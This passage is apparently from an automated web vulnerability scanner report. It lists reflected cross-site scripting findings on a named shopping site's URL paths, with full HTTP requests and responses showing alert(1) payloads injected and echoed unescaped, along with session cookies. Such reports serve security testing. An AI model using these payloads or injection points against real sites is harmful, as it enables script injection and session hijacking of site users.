This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping5d794"><a>5692be18d18/Home-Furnishings/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping5d794"><a>5692be18d18">
...[SNIP]...

4.973. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f959d'-alert(1)-'0fcd73ab29f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishingsf959d'-alert(1)-'0fcd73ab29f/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:41:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61435

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishingsf959d'-alert(1)-'0fcd73ab29f';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.974. http://www.beirut.com/Shopping/Home-Furnishings/4120758082 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2798b<script>alert(1)</script>e80285ad017 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings2798b<script>alert(1)</script>e80285ad017/4120758082 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:42:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings2798b<script>alert(1)</script>e80285ad017 <a href="#" id="backlink">
...[SNIP]...

4.975. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d6f"><a>e3a5616e2bd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping44d6f"><a>e3a5616e2bd/Home-Furnishings/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:04:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping44d6f"><a>e3a5616e2bd">
...[SNIP]...

4.976. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 410d3'-alert(1)-'a317e9c2aac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping410d3'-alert(1)-'a317e9c2aac/Home-Furnishings/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:10:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping410d3'-alert(1)-'a317e9c2aac/Home-Furnishings/4120758082/Antiques-Collectibles/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.977. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8ce98<script>alert(1)</script>c2ed3248485 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings8ce98<script>alert(1)</script>c2ed3248485/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings8ce98<script>alert(1)</script>c2ed3248485 <a href="#" id="backlink">
...[SNIP]...

4.978. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d32f'-alert(1)-'bfb49ae926 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings8d32f'-alert(1)-'bfb49ae926/4120758082/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:15:42 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings8d32f'-alert(1)-'bfb49ae926/4120758082/Antiques-Collectibles/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.979. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1dd37'-alert(1)-'f03c05fd27d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/41207580821dd37'-alert(1)-'f03c05fd27d/Antiques-Collectibles/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61523

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings/41207580821dd37'-alert(1)-'f03c05fd27d/Antiques-Collectibles/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.980. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62a4f'-alert(1)-'f295ff77627 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles62a4f'-alert(1)-'f295ff77627/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:23:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings/4120758082/Antiques-Collectibles62a4f'-alert(1)-'f295ff77627/1';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.981. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/1

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9217c'-alert(1)-'c47ec416d99 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/19217c'-alert(1)-'c47ec416d99 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:28:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54958

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Antiques-Collectibles/19217c'-alert(1)-'c47ec416d99';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.982. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a7b3"><a>247829c505e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2a7b3"><a>247829c505e/Home-Furnishings/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2a7b3"><a>247829c505e">
...[SNIP]...

4.983. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea5bc'-alert(1)-'b56e3f4b579 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppingea5bc'-alert(1)-'b56e3f4b579/Home-Furnishings/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:25:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppingea5bc'-alert(1)-'b56e3f4b579/Home-Furnishings/4120758082/Art/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.984. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2634<script>alert(1)</script>37645397f51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsa2634<script>alert(1)</script>37645397f51/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:31:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsa2634<script>alert(1)</script>37645397f51 <a href="#" id="backlink">
...[SNIP]...

4.985. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd7c0'-alert(1)-'72d10295555 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

